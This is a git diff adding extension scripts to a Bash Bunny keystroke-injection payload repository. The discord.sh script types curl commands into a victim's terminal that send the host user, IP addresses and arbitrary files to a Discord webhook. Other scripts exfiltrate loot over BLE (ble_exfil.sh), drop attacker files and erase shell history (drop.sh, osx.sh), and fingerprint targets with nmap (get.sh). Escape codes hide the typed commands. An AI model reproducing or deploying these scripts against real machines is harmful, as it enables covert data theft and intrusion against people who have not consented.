"ALT-SHIFT": "06,00,00",
|
||||
"__comment": "Below 5 key combinations are for Mac OSX",
|
||||
"__comment": "Example: (COMMAND-OPTION SHIFT t) to open terminal",
|
||||
"COMMAND": "08,00,00",
|
||||
"COMMAND-CTRL": "09,00,00",
|
||||
"COMMAND-CTRL-SHIFT": "0B,00,00",
|
||||
"COMMAND-OPTION": "0C,00,00",
|
||||
"COMMAND-OPTION-SHIFT": "0E,00,00",
|
||||
"a": "00,00,04",
|
||||
"A": "02,00,04",
|
||||
"b": "00,00,05",
|
||||
"B": "02,00,05",
|
||||
"c": "00,00,06",
|
||||
"C": "02,00,06",
|
||||
"d": "00,00,07",
|
||||
"D": "02,00,07",
|
||||
"e": "00,00,08",
|
||||
"E": "02,00,08",
|
||||
"f": "00,00,09",
|
||||
"F": "02,00,09",
|
||||
"g": "00,00,0a",
|
||||
"G": "02,00,0a",
|
||||
"h": "00,00,0b",
|
||||
"H": "02,00,0b",
|
||||
"i": "00,00,0c",
|
||||
"I": "02,00,0c",
|
||||
"j": "00,00,0d",
|
||||
"J": "02,00,0d",
|
||||
"k": "00,00,0e",
|
||||
"K": "02,00,0e",
|
||||
"l": "00,00,0f",
|
||||
"L": "02,00,0f",
|
||||
"m": "00,00,10",
|
||||
"M": "02,00,10",
|
||||
"n": "00,00,11",
|
||||
"N": "02,00,11",
|
||||
"o": "00,00,12",
|
||||
"O": "02,00,12",
|
||||
"p": "00,00,13",
|
||||
"P": "02,00,13",
|
||||
"q": "00,00,14",
|
||||
"Q": "02,00,14",
|
||||
"r": "00,00,15",
|
||||
"R": "02,00,15",
|
||||
"s": "00,00,16",
|
||||
"S": "02,00,16",
|
||||
"t": "00,00,17",
|
||||
"T": "02,00,17",
|
||||
"u": "00,00,18",
|
||||
"U": "02,00,18",
|
||||
"v": "00,00,19",
|
||||
"V": "02,00,19",
|
||||
"w": "00,00,1a",
|
||||
"W": "02,00,1a",
|
||||
"x": "00,00,1b",
|
||||
"X": "02,00,1b",
|
||||
"y": "00,00,1c",
|
||||
"Y": "02,00,1c",
|
||||
"z": "00,00,1d",
|
||||
"Z": "02,00,1d",
|
||||
"1": "00,00,1e",
|
||||
"!": "02,00,1e",
|
||||
"2": "00,00,1f",
|
||||
"@": "02,00,1f",
|
||||
"3": "00,00,20",
|
||||
"#": "02,00,20",
|
||||
"4": "00,00,21",
|
||||
"$": "02,00,21",
|
||||
"5": "00,00,22",
|
||||
"%": "02,00,22",
|
||||
"6": "00,00,23",
|
||||
"^": "02,00,23",
|
||||
"7": "00,00,24",
|
||||
"&": "02,00,24",
|
||||
"8": "00,00,25",
|
||||
"*": "02,00,25",
|
||||
"9": "00,00,26",
|
||||
"(": "02,00,26",
|
||||
"0": "00,00,27",
|
||||
")": "02,00,27",
|
||||
"ENTER": "00,00,28",
|
||||
"ESC": "00,00,29",
|
||||
"ESCAPE": "00,00,29",
|
||||
"BACKSPACE": "00,00,2a",
|
||||
"TAB": "00,00,2b",
|
||||
"ALT-TAB": "04,00,2b",
|
||||
"SPACE": "00,00,2c",
|
||||
" ": "00,00,2c",
|
||||
"-": "00,00,2d",
|
||||
"_": "02,00,2d",
|
||||
"=": "00,00,2e",
|
||||
"+": "02,00,2e",
|
||||
"[": "00,00,2f",
|
||||
"{": "02,00,2f",
|
||||
"]": "00,00,30",
|
||||
"}": "02,00,30",
|
||||
"\\": "00,00,31",
|
||||
"|": "02,00,31",
|
||||
";": "00,00,33",
|
||||
":": "02,00,33",
|
||||
"'": "00,00,34",
|
||||
"\"": "02,00,34",
|
||||
"`": "00,00,35",
|
||||
"~": "02,00,35",
|
||||
",": "00,00,36",
|
||||
"<": "02,00,36",
|
||||
".": "00,00,37",
|
||||
">": "02,00,37",
|
||||
"/": "00,00,38",
|
||||
"?": "02,00,38",
|
||||
"CAPSLOCK": "00,00,39",
|
||||
"F1": "00,00,3a",
|
||||
"F2": "00,00,3b",
|
||||
"F3": "00,00,3c",
|
||||
"F4": "00,00,3d",
|
||||
"F5": "00,00,3e",
|
||||
"F6": "00,00,3f",
|
||||
"F7": "00,00,40",
|
||||
"F8": "00,00,41",
|
||||
"F9": "00,00,42",
|
||||
"F10": "00,00,43",
|
||||
"F11": "00,00,44",
|
||||
"F12": "00,00,45",
|
||||
"PRINTSCREEN":"00,00,46",
|
||||
"SCROLLLOCK": "00,00,47",
|
||||
"PAUSE": "00,00,48",
|
||||
"BREAK": "00,00,48",
|
||||
"INSERT": "00,00,49",
|
||||
"HOME": "00,00,4a",
|
||||
"PAGEUP": "00,00,4b",
|
||||
"DELETE": "00,00,4c",
|
||||
"DEL": "00,00,4c",
|
||||
"END": "00,00,4d",
|
||||
"PAGEDOWN": "00,00,4e",
|
||||
"RIGHTARROW": "00,00,4f",
|
||||
"RIGHT": "00,00,4f",
|
||||
"LEFTARROW": "00,00,50",
|
||||
"LEFT": "00,00,50",
|
||||
"DOWNARROW": "00,00,51",
|
||||
"DOWN": "00,00,51",
|
||||
"UPARROW": "00,00,52",
|
||||
"UP": "00,00,52",
|
||||
"NUMLOCK": "00,00,53",
|
||||
"MENU": "00,00,65",
|
||||
"APP": "00,00,65"
|
||||
}
|
||||
|
||||
16
payloads/extensions/ble_exfil.sh
Normal file
16
payloads/extensions/ble_exfil.sh
Normal file
@@ -0,0 +1,16 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# BLE_EXFIL v1 by @drapl0n
|
||||
# Exfiltrate data(25 bytes) stored in "/loot/ble_exfil.txt" via BLE.
|
||||
# Usage: BLE_EXFIL
|
||||
|
||||
function BLE_EXFIL() {
|
||||
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
|
||||
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
|
||||
sleep 1
|
||||
text=$(cat /root/udisk/loot/ble_exfil.txt)
|
||||
exfil=${text:0:25}
|
||||
echo -n -e "AT+ADVDAT=$exfil" > /dev/ttyS1
|
||||
}
|
||||
|
||||
export -f BLE_EXFIL
|
||||
25
payloads/extensions/cucumber.sh
Executable file
25
payloads/extensions/cucumber.sh
Executable file
@@ -0,0 +1,25 @@
|
||||
#!/bin/bash
|
||||
|
||||
function CUCUMBER() {
|
||||
case $1 in
|
||||
"ENABLE")
|
||||
echo ondemand | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null
|
||||
echo 0 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null
|
||||
;;
|
||||
"DISABLE")
|
||||
echo 1 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null
|
||||
sleep 2
|
||||
echo ondemand | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null
|
||||
;;
|
||||
"PLAID")
|
||||
echo 1 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null
|
||||
sleep 2
|
||||
echo performance | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null
|
||||
;;
|
||||
*)
|
||||
LED FAIL
|
||||
exit 1
|
||||
esac
|
||||
}
|
||||
|
||||
export -f CUCUMBER
|
||||
27
payloads/extensions/debug.sh
Executable file
27
payloads/extensions/debug.sh
Executable file
@@ -0,0 +1,27 @@
|
||||
#!/bin/bash
|
||||
|
||||
################################################################################
|
||||
# Allow Debugging messages written to: "/root/udisk/debug/[session].txt"
|
||||
# on the BashBunny
|
||||
#
|
||||
# How this works?
|
||||
# 1) Example Command: DEBUG "switch-1-debug" "Hello from debug extension!"
|
||||
# 2) After bashing, text can be read at: "/root/udisk/debug/[session].txt"
|
||||
# on the BashBunny
|
||||
################################################################################
|
||||
|
||||
function DEBUG() {
|
||||
session=$1
|
||||
message=$2
|
||||
|
||||
timestamp () {
|
||||
echo "$(date +"%Y-%m-%d_%H-%M-%S")"
|
||||
}
|
||||
|
||||
mkdir -p /root/udisk/debug/
|
||||
debug_file="/root/udisk/debug/${session}.txt"
|
||||
[[ -f "${debug_file}" ]] || echo "$(timestamp): DEBUG STARTED" >> "${debug_file}"
|
||||
echo "$(timestamp): ${message}" >> ${debug_file}
|
||||
}
|
||||
|
||||
export -f DEBUG
|
||||
86
payloads/extensions/discord.sh
Executable file
86
payloads/extensions/discord.sh
Executable file
@@ -0,0 +1,86 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: Discord Extension
|
||||
# Description: Interact with discord webhook to exfiltrate text or files
|
||||
# Author: quentin_lamamy <contact@quentin-lamamy.fr>
|
||||
# Version: 1.0
|
||||
# Category: Extension
|
||||
#
|
||||
# To use this extension, you need to create a webhook on discord and get the webhook id and token
|
||||
# During your setup steps, you need to set the DISCORD_WEBHOOK_ID and DISCORD_WEBHOOK_TOKEN variables
|
||||
# DISCORD_WEBHOOK_ID="<DISCORD_WEBHOOK_ID>""
|
||||
# DISCORD_WEBHOOK_TOKEN="<DISCORD_WEBHOOK_TOKEN>"
|
||||
|
||||
function DISCORD() {
|
||||
|
||||
case $1 in
|
||||
|
||||
# @desc Initialize the exfiltration session by posting an embed message on discord with host information
|
||||
# @usage DISCORD INIT
|
||||
# @info This command need a $BB_HOST_* variables (Set by default if you use my OSX extension)
|
||||
"INIT")
|
||||
|
||||
curl_location="https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN"
|
||||
curl_header="Content-Type: application/json"
|
||||
|
||||
Q STRING "printf '\e7'"
|
||||
Q ENTER
|
||||
Q STRING "curl --location '$curl_location'"
|
||||
Q STRING " --header '$curl_header'"
|
||||
Q STRING " --data '{\"embeds\": [{\"author\": {\"name\": \"New exfiltration session\",\"icon_url\": \"https://cdn-icons-png.flaticon.com/512/2/2235.png\"},\"color\": \"15258703\",\"fields\": [{\"name\":\"OS\",\"value\":\""
|
||||
Q STRING "'\${BB_HOST_OS}'"
|
||||
Q STRING "\",\"inline\":true},{\"name\":\"Public ip\",\"value\":\""
|
||||
Q STRING "'\${BB_HOST_IP_V4}'"
|
||||
Q STRING "\",\"inline\":true},{\"name\":\"Public ip\",\"value\":\""
|
||||
Q STRING "'\${BB_HOST_IP_V6}'"
|
||||
Q STRING "\",\"inline\":true},{\"name\":\"User\",\"value\":\""
|
||||
Q STRING "'\${BB_HOST_USER}'"
|
||||
Q STRING "\",\"inline\":true}]"
|
||||
Q STRING "}]}'"
|
||||
Q ENTER
|
||||
Q STRING "printf '\e8\e[1A\e[0J'"
|
||||
Q ENTER
|
||||
|
||||
;;
|
||||
|
||||
"SEND")
|
||||
|
||||
case $2 in
|
||||
|
||||
# @desc Send a message to discord via webhook
|
||||
# @usage DISCORD SEND MSG $yourMessage
|
||||
"MSG")
|
||||
|
||||
if [[ "$3" == *"$"* ]]; then
|
||||
message="'$3'"
|
||||
else
|
||||
message=$3
|
||||
fi
|
||||
|
||||
Q STRING "printf '\e7'"
|
||||
Q ENTER
|
||||
Q STRING "curl --location 'https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN' --header 'Content-Type: application/json' --data '{\"content\": \"$message\"}' && printf '\e[3A\e[K\e[0J'"
|
||||
Q ENTER
|
||||
Q STRING "printf '\e8\e[1A\e[0J'"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
# @desc Send a file to discord via webhook
|
||||
# @usage DISCORD SEND FILE $yourFilePath
|
||||
"FILE")
|
||||
Q STRING "printf '\e7'"
|
||||
Q ENTER
|
||||
Q STRING "curl --location 'https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN' --form '=@\"$3\"' && printf '\e[3A\e[K\e[0J'"
|
||||
Q ENTER
|
||||
Q STRING "printf '\e8\e[1A\e[0J'"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
esac
|
||||
|
||||
;;
|
||||
|
||||
esac
|
||||
}
|
||||
|
||||
export -f DISCORD
|
||||
103
payloads/extensions/drop.sh
Normal file
103
payloads/extensions/drop.sh
Normal file
@@ -0,0 +1,103 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# DROP v1 by bg-wa
|
||||
# Simplifies dropping files from HID attacks for LINUX
|
||||
# Usage: DROP [OS] bb_source_file.txt attack_destination_file.txt [overwrite: false] [executable: false]
|
||||
#
|
||||
# Example:
|
||||
# DROP UNITY /root/udisk/payloads/$SWITCH_POSITION/source.sh ~/target_destination.sh true true
|
||||
source ./run.sh
|
||||
|
||||
function DROP() {
|
||||
os=$1
|
||||
source=$2
|
||||
destination=$3
|
||||
overwrite=$4
|
||||
executable=$5
|
||||
|
||||
case "$os" in
|
||||
WIN)
|
||||
RUN WIN powershell
|
||||
;;
|
||||
OSX)
|
||||
RUN OSX terminal
|
||||
;;
|
||||
UNITY)
|
||||
RUN UNITY terminal
|
||||
;;
|
||||
LINUX)
|
||||
RUN LINUX terminal
|
||||
;;
|
||||
*)
|
||||
RUN UNITY terminal
|
||||
;;
|
||||
esac
|
||||
|
||||
QUACK DELAY 1000
|
||||
|
||||
if "$overwrite" == "true"
|
||||
then
|
||||
case "$os" in
|
||||
WIN)
|
||||
QUACK STRING del "$destination"
|
||||
;;
|
||||
*)
|
||||
QUACK STRING rm "$destination"
|
||||
;;
|
||||
esac
|
||||
QUACK ENTER
|
||||
QUACK DELAY 500
|
||||
fi
|
||||
|
||||
case "$os" in
|
||||
WIN)
|
||||
QUACK STRING fsutil file createnew "$destination"
|
||||
QUACK ENTER
|
||||
QUACK DELAY 500
|
||||
QUACK STRING notepad.exe "$destination"
|
||||
QUACK ENTER
|
||||
QUACK DELAY 1000
|
||||
;;
|
||||
*)
|
||||
QUACK STRING vi "$destination"
|
||||
QUACK ENTER
|
||||
QUACK DELAY 500
|
||||
QUACK STRING i
|
||||
;;
|
||||
esac
|
||||
|
||||
while IFS= read -r data
|
||||
do
|
||||
QUACK STRING "$data"
|
||||
QUACK ENTER
|
||||
done < "$source"
|
||||
|
||||
QUACK DELAY 500
|
||||
|
||||
case "$os" in
|
||||
WIN)
|
||||
QUACK CTRL s
|
||||
QUACK CRTL x
|
||||
;;
|
||||
*)
|
||||
QUACK ESC
|
||||
QUACK ENTER
|
||||
QUACK STRING :wq
|
||||
QUACK ENTER
|
||||
|
||||
if "$executable" == "true"
|
||||
then
|
||||
QUACK STRING chmod +x "$destination"
|
||||
QUACK ENTER
|
||||
QUACK DELAY 500
|
||||
fi
|
||||
|
||||
QUACK STRING history -c
|
||||
QUACK ENTER
|
||||
QUACK STRING exit
|
||||
QUACK ENTER
|
||||
;;
|
||||
esac
|
||||
}
|
||||
|
||||
export -f DROP
|
||||
@@ -1,8 +1,8 @@
|
||||
#!/bin/bash
|
||||
|
||||
function DUCKY_LANG() {
|
||||
[[ -z "$1" ]] && exit 1 # parameter must be set
|
||||
[[ -z "$1" ]] && exit 1 # parameter must be set
|
||||
|
||||
export DUCKY_LANG="$1"
|
||||
export DUCKY_LANG="$1"
|
||||
}
|
||||
export -f DUCKY_LANG
|
||||
|
||||
@@ -1,23 +1,36 @@
|
||||
#!/bin/bash
|
||||
|
||||
function GET() {
|
||||
case $1 in
|
||||
"TARGET_IP")
|
||||
export TARGET_IP=$(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq)
|
||||
;;
|
||||
"TARGET_HOSTNAME")
|
||||
export TARGET_HOSTNAME=$(cat /var/lib/dhcp/dhcpd.leases | grep hostname | awk '{print $2 }' | sort | uniq | tail -n1 | sed "s/^[ \t]*//" | sed 's/\"//g' | sed 's/;//')
|
||||
;;
|
||||
"HOST_IP")
|
||||
export HOST_IP=$(cat /etc/network/interfaces.d/usb0 | grep address | awk {'print $2'})
|
||||
;;
|
||||
"SWITCH_POSITION")
|
||||
[[ "$(cat /sys/class/gpio_sw/PA8/data)" == "0" ]] && export SWITCH_POSITION="switch1" && return
|
||||
[[ "$(cat /sys/class/gpio_sw/PL4/data)" == "0" ]] && export SWITCH_POSITION="switch2" && return
|
||||
[[ "$(cat /sys/class/gpio_sw/PL3/data)" == "0" ]] && export SWITCH_POSITION="switch3" && return
|
||||
export SWITCH_POSITION="invalid"
|
||||
;;
|
||||
esac
|
||||
case $1 in
|
||||
"TARGET_IP")
|
||||
export TARGET_IP=$(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq)
|
||||
;;
|
||||
"TARGET_HOSTNAME")
|
||||
export TARGET_HOSTNAME=$(cat /var/lib/dhcp/dhcpd.leases | grep hostname | awk '{print $2 }' | sort | uniq | tail -n1 | sed "s/^[ \t]*//" | sed 's/\"//g' | sed 's/;//')
|
||||
;;
|
||||
"HOST_IP")
|
||||
export HOST_IP=$(cat /etc/network/interfaces.d/usb0 | grep address | awk {'print $2'})
|
||||
;;
|
||||
"SWITCH_POSITION")
|
||||
[[ "$(cat /sys/class/gpio_sw/PA8/data)" == "0" ]] && export SWITCH_POSITION="switch1" && return
|
||||
[[ "$(cat /sys/class/gpio_sw/PL4/data)" == "0" ]] && export SWITCH_POSITION="switch2" && return
|
||||
[[ "$(cat /sys/class/gpio_sw/PL3/data)" == "0" ]] && export SWITCH_POSITION="switch3" && return
|
||||
export SWITCH_POSITION="invalid"
|
||||
;;
|
||||
"TARGET_OS")
|
||||
TARGET_IP=$(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq)
|
||||
ScanForOS=$(nmap -Pn -O $TARGET_IP -p1 -v2)
|
||||
[[ $ScanForOS == *"Too many fingerprints"* ]] && ScanForOS=$(nmap -Pn -O $TARGET_IP --osscan-guess -v2)
|
||||
[[ "${ScanForOS,,}" == *"windows"* ]] && export TARGET_OS='WINDOWS' && return
|
||||
[[ "${ScanForOS,,}" == *"apple"* ]] && export TARGET_OS='MACOS' && return
|
||||
[[ "${ScanForOS,,}" == *"linux"* ]] && export TARGET_OS='LINUX' && return
|
||||
export TARGET_OS='UNKNOWN'
|
||||
;;
|
||||
"BB_LABEL")
|
||||
export BB_LABEL=$(ls -l /dev/disk/by-label/ | awk '/nandf$/ { print $9 }')
|
||||
;;
|
||||
|
||||
esac
|
||||
}
|
||||
|
||||
export -f GET
|
||||
export -f GET
|
||||
|
||||
59
payloads/extensions/get2_dhclient.sh
Executable file
59
payloads/extensions/get2_dhclient.sh
Executable file
@@ -0,0 +1,59 @@
|
||||
#!/bin/bash
|
||||
|
||||
# get2_dhclient.sh - Bash Bunny extension to change from a DHCP server to a client.
|
||||
# This is needed when connected to macOS/OSX with Internet Sharing because
|
||||
# the host is the DHCP server and the Bash Bunny is the DHCP client.
|
||||
#
|
||||
# It also replaces the standard GET function so that TARGET_IP, TARGET_HOSTNAME
|
||||
# and HOST_IP work properly without having to modify the standard version. It
|
||||
# renames and uses the standard version for any other environment variables.
|
||||
#
|
||||
# Note that this must be sourced after get.sh so it is named "get2_dhclient.sh"
|
||||
# on the assumption that they are sourced in order by filename.
|
||||
#
|
||||
# This is free software released under the terms of the GPLv2+
|
||||
#
|
||||
# 20190321 raf <raf@raf.org>
|
||||
|
||||
function DHCLIENT() {
|
||||
|
||||
# Do nothing if GET isn't defined (get.sh hasn't been sourced yet)
|
||||
[ $(declare -f GET | /usr/bin/wc -l) = 0 ] && return
|
||||
|
||||
# Do nothing if we've already done it
|
||||
[ $(declare -f orig_GET | /usr/bin/wc -l) != 0 ] && return
|
||||
|
||||
# Stop the DHCP server if it is running
|
||||
/bin/systemctl status isc-dhcp-server && /bin/systemctl stop isc-dhcp-server
|
||||
|
||||
# Bring down the usb0 network interface
|
||||
/sbin/ifdown usb0
|
||||
|
||||
# Bring it up again as a DHCP client
|
||||
/sbin/dhclient usb0
|
||||
|
||||
# Rename the standard GET function before we replace it
|
||||
eval "$(echo "orig_GET()"; declare -f GET | tail -n +2)"
|
||||
export -f orig_GET
|
||||
|
||||
# Replace GET so that TARGET_IP, TARGET_HOSTNAME and HOST_IP work
|
||||
function GET() {
|
||||
case "$1" in
|
||||
"TARGET_IP")
|
||||
export TARGET_IP=$(awk '/option routers/ { tip = substr($3, 1, length($3)-1) } END { print tip }' /var/lib/dhcp/dhclient.leases)
|
||||
;;
|
||||
"TARGET_HOSTNAME")
|
||||
export TARGET_HOSTNAME=$(awk '/server-name/ { thn = substr($2, 2, length($2)-3) } END { print thn }' /var/lib/dhcp/dhclient.leases)
|
||||
;;
|
||||
"HOST_IP")
|
||||
export HOST_IP=$(awk '/fixed-address/ { hip = substr($2, 1, length($2)-1) } END { print hip }' /var/lib/dhcp/dhclient.leases)
|
||||
;;
|
||||
*)
|
||||
orig_GET "$1"
|
||||
;;
|
||||
esac
|
||||
}
|
||||
}
|
||||
|
||||
export -f DHCLIENT
|
||||
|
||||
30
payloads/extensions/linux_mount.sh
Normal file
30
payloads/extensions/linux_mount.sh
Normal file
@@ -0,0 +1,30 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# LINUX_MOUNT v1 by @drapl0n
|
||||
# Auto mounts BashBunny on GNU/Linux systems.
|
||||
# NOTE: Mount path is stored in variable "lmnt".
|
||||
# Usage: LINUX_MOUNT - to automatically mount BashBunny.
|
||||
# LINUX_UMOUNT - to unmount mounted BashBunny.
|
||||
|
||||
function LINUX_MOUNT() {
|
||||
Q CTRL-ALT t
|
||||
Q DELAY 1000
|
||||
Q STRING unset HISTFILE
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
Q STRING disk='$(lsblk -fs | grep BashBunny | awk '\'{print\ '$1'}\'\)''
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
Q STRING udisksctl mount -b /dev/'$disk'
|
||||
Q ENTER
|
||||
Q DELAY 2000
|
||||
Q STRING lmnt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
}
|
||||
function LINUX_UMOUNT() {
|
||||
Q STRING udisksctl unmount -b /dev/'$disk'
|
||||
Q ENTER
|
||||
Q DELAY 1000
|
||||
}
|
||||
export -f LINUX_MOUNT LINUX_UMOUNT
|
||||
29
payloads/extensions/mac_happy.sh
Executable file
29
payloads/extensions/mac_happy.sh
Executable file
@@ -0,0 +1,29 @@
|
||||
#!/bin/bash
|
||||
|
||||
# Title: Mac_Happy
|
||||
# Author: thehappydinoa
|
||||
# Target: macOS
|
||||
# Version: 0.3
|
||||
#
|
||||
# Makes Mac happy by correctly setting pid and vid
|
||||
# Use by running MAC_HAPPY HID/ETHERNET/...
|
||||
#
|
||||
|
||||
function MAC_HAPPY() {
|
||||
[[ "$#" -gt 1 ]] || exit 1
|
||||
case "$1" in
|
||||
HID)
|
||||
ATTACKMODE HID vid_0x05ac pid_0x021e
|
||||
;;
|
||||
ETHERNET)
|
||||
ATTACKMODE ECM_ETHERNET vid_0x05ac pid_0x021e
|
||||
;;
|
||||
ATTACKMODE)
|
||||
eval "$@ vid_0x05ac pid_0x021e"
|
||||
;;
|
||||
*)
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
}
|
||||
export -f MAC_HAPPY
|
||||
278
payloads/extensions/osx.sh
Executable file
278
payloads/extensions/osx.sh
Executable file
@@ -0,0 +1,278 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: OSX Extension
|
||||
# Description: Allow a bunch of osx interaction
|
||||
# Author: quentin_lamamy <contact@quentin-lamamy.fr>
|
||||
# Version: 2.0
|
||||
# Category: Extension
|
||||
|
||||
function OSX() {
|
||||
|
||||
case $1 in
|
||||
|
||||
"TERMINAL")
|
||||
|
||||
case $2 in
|
||||
|
||||
# @desc Open a terminal
|
||||
# @usage OSX TERMINAL OPEN
|
||||
"OPEN")
|
||||
Q GUI SPACE
|
||||
Q STRING terminal
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
# @desc Initialize the terminal
|
||||
# Make the PS1 nicer (just because I like it)
|
||||
# Grab Host information and store it in BB_OSX vars
|
||||
# @usage OSX TERMINAL INIT
|
||||
# @info This command need a focused terminal
|
||||
"INIT")
|
||||
|
||||
Q STRING "bash"
|
||||
Q ENTER
|
||||
Q STRING "clear"
|
||||
Q ENTER
|
||||
Q STRING "printf '\e7'"
|
||||
Q ENTER
|
||||
Q STRING "export PS1='\e[0;31mbashbunny>\e[m '"
|
||||
Q ENTER
|
||||
Q STRING 'BB_HOST_USER=$(whoami)'
|
||||
Q ENTER
|
||||
|
||||
Q STRING 'BB_HOST_NAME=$(hostname)'
|
||||
Q ENTER
|
||||
|
||||
Q STRING "BB_HOST_OS='OSX'"
|
||||
Q ENTER
|
||||
|
||||
Q STRING 'BB_HOST_IP_V4=$(curl -s ipinfo.io/ip)'
|
||||
Q ENTER
|
||||
|
||||
Q STRING 'BB_HOST_IP_V6=$(curl -s ident.me)'
|
||||
Q ENTER
|
||||
|
||||
Q STRING "printf '\e8\e[1A\e[0J'"
|
||||
Q ENTER
|
||||
|
||||
;;
|
||||
|
||||
# @desc Minimize the terminal
|
||||
# @usage OSX TERMINAL MINIMIZE
|
||||
# @info This command need a focused terminal
|
||||
"MINIMIZE")
|
||||
Q STRING 'printf \e[2t'
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
# @desc Resize the focused terminal
|
||||
# @usage OSX TERMINAL RESIZE $width $height
|
||||
# @param <integer> $width The terminal width
|
||||
# @param <integer> $height The terminal height
|
||||
# @info This command need a focused terminal
|
||||
"RESIZE")
|
||||
Q STRING "printf '\e[8;'$4';'$3't' && printf '\e[2A\e[K\e[0J'"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
# @desc Clear the focused terminal
|
||||
# @usage OSX TERMINAL ZOOM
|
||||
# @info This command need a focused terminal
|
||||
"CLEAR")
|
||||
Q STRING clear
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
# @desc Close all terminal
|
||||
# @usage OSX TERMINAL CLOSE
|
||||
# @info This command need a focused terminal
|
||||
"CLOSE")
|
||||
Q STRING history -c
|
||||
Q ENTER
|
||||
Q STRING killall Terminal
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
# @desc Change terminal window name
|
||||
# @usage OSX TERMINAL NAME <WINDOW_NAME>
|
||||
# @info This command need a focused terminal
|
||||
"NAME")
|
||||
Q STRING "printf '\033]0;'$3'\007' && printf '\e[2A\e[K\e[0J'"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
esac
|
||||
|
||||
;;
|
||||
|
||||
"NETWORK")
|
||||
|
||||
case $2 in
|
||||
|
||||
"WIFI")
|
||||
|
||||
case $3 in
|
||||
|
||||
# @desc Enable wifi
|
||||
# @usage OSX NETWORK WIFI ENABLE
|
||||
"ENABLE")
|
||||
Q STRING "networksetup -setairportpower en0 on"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
# @desc Disable wifi
|
||||
# @usage OSX NETWORK WIFI DISABLE
|
||||
"DISABLE")
|
||||
Q STRING "networksetup -setairportpower en0 off"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
# @desc Connect to a wifi network
|
||||
# @usage OSX NETWORK CONNECT $ssid $password
|
||||
# @arg <string> Wifi SSID
|
||||
# @arg <string> Wifi Password
|
||||
"CONNECT")
|
||||
Q STRING "networksetup -setairportnetwork en0 $4 $5"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
esac
|
||||
|
||||
;;
|
||||
|
||||
"ETHERNET")
|
||||
;;
|
||||
|
||||
esac
|
||||
;;
|
||||
|
||||
"SESSION")
|
||||
|
||||
case $2 in
|
||||
|
||||
# @desc Shutdown the computer
|
||||
# @usage OSX SESSION SHUTDOWN
|
||||
"SHUTDOWN")
|
||||
Q STRING "osascript -e 'tell app \"System Events\" to shut down'"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
# @desc Restart the computer
|
||||
# @usage OSX SESSION RESTART
|
||||
"RESTART")
|
||||
Q STRING "osascript -e 'tell app \"System Events\" to restart'"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
# @desc Lock the computer
|
||||
# @usage OSX SESSION LOCK
|
||||
"LOCK")
|
||||
Q STRING "osascript -e 'tell app \"System Events\" to sleep'"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
# @desc Logout current session
|
||||
# @usage OSX SESSION LOGOUT
|
||||
"LOGOUT")
|
||||
Q STRING "osascript -e 'tell app \"System Events\" to log out'"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
"GET_USER")
|
||||
#Q STRING "BB_OSX_USER=$(who | grep console | cut -d ' ' -f 1)"
|
||||
Q STRING 'BB_OSX_USER=$(whoami)'
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
esac
|
||||
|
||||
;;
|
||||
|
||||
"SOUND")
|
||||
|
||||
case $2 in
|
||||
|
||||
"PLAY")
|
||||
Q STRING "afplay $3"
|
||||
;;
|
||||
|
||||
# @desc Change the computer volume
|
||||
# @usage OSX MISC VOLUME $volumeValue
|
||||
# @arg <integer> An integer between 0 and 10
|
||||
"VOLUME")
|
||||
Q STRING "osascript -e 'set Volume $3'"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
esac
|
||||
;;
|
||||
|
||||
"NOTIFICATION")
|
||||
|
||||
case $2 in
|
||||
|
||||
"CLEAR")
|
||||
Q STRING "ps -e | grep /NotificationCenter | grep app | cut -d ' ' -f 1 | xargs kill -9 && printf '\e[2A\e[K\e[0J'"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
"DISPLAY")
|
||||
|
||||
if [ -z $6]; then
|
||||
$6=${1:-"Purr"}
|
||||
fi
|
||||
|
||||
Q STRING "osascript -e 'display notification \"$3\" with title \"$4\" subtitle \"$5\" sound name \"$6\"'"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
esac
|
||||
|
||||
|
||||
;;
|
||||
|
||||
"MISC")
